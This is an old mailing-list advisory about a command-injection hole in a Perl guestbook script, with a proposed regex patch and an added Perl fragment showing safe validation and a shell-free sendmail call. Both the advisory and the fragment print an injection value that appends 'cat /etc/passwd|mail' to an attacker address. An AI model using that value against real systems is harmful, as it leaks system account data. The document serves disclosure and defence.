cgi vulnerability

From: supdavid (supdavidat_private)
Date: Tue Oct 30 2001 - 07:04:23 PST


hi all
I found a security hole in Book of guests and Post it! written by Seth
Leonard. It is available at http://www.dreamcachersweb.com
The problem is that this script doesn't filter out ANY metacharacters from
the input and passes it to the shell.
Therefore by writing something like emailat_private;cat /etc/passwd|mail
evilat_private into the email field, the attacker could take control
over the host.

patch:
first of all it isn't a bad idea to set the permissions of the script
correctly. Furthermore the line
if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... } should be replaced by something
like
if ($INPUT{'email'} =~ /^[\w.-]+\@[\w.-]+$/) { ... }

David Kumme, 16
    
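An added illustration, not part of the original post or of the guestbook script: a Perl fragment that contrasts the original '@'-anywhere test with an anchored whitelist check in the spirit of the proposed patch, and then hands the address to sendmail without involving a shell. The sendmail path, the function names and the sample inputs are assumptions made for the example.

```perl
#!/usr/bin/perl -T
use strict;
use warnings;

# Taint mode (-T) refuses to pass untrusted data to exec unless it has been
# through a regex capture; it also insists on a known-safe environment.
$ENV{PATH} = '/usr/sbin:/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# What the advisory describes: the original test only looks for an '@'
# somewhere in the field, so the injection string passes it.
sub original_check {
    my ($email) = @_;
    return $email =~ /(.*)\@(.*)/ ? 1 : 0;
}

# Tightened version of the proposed patch: anchored at both ends, only word
# characters, dots and hyphens allowed, and the local part must start with a
# word character so the value can never be read as a sendmail option.
# The capture also untaints the value for taint mode.
sub untaint_email {
    my ($email) = @_;
    return ($email =~ /^(\w[\w.-]*\@[\w.-]+)\z/) ? $1 : undef;
}

# Assumed mailer path; list-form open runs sendmail directly, no shell involved.
sub send_notification {
    my ($raw_email, $body) = @_;
    my $email = untaint_email($raw_email);
    die "rejected address\n" unless defined $email;
    open(my $mail, '|-', '/usr/sbin/sendmail', '-oi', $email)
        or die "cannot run sendmail: $!\n";
    print $mail "To: $email\nSubject: New guestbook entry\n\n$body\n";
    close($mail) or die "sendmail exited with status $?\n";
    return 1;
}

# Constructed inputs: a normal address, the injection string from the
# advisory, and a header-injection attempt with an embedded newline.
my @samples = (
    'someone@example.com',
    'email@example.com;cat /etc/passwd|mail evil@example.com',
    "someone\@example.com\nBcc: other\@example.com",
);
for my $s (@samples) {
    my $ok = defined untaint_email($s) ? 1 : 0;
    printf "%-60s original=%d strict=%d\n", $s =~ s/\n/\\n/gr, original_check($s), $ok;
}
```

The strict check rejects the second and third samples; the original check accepts all three.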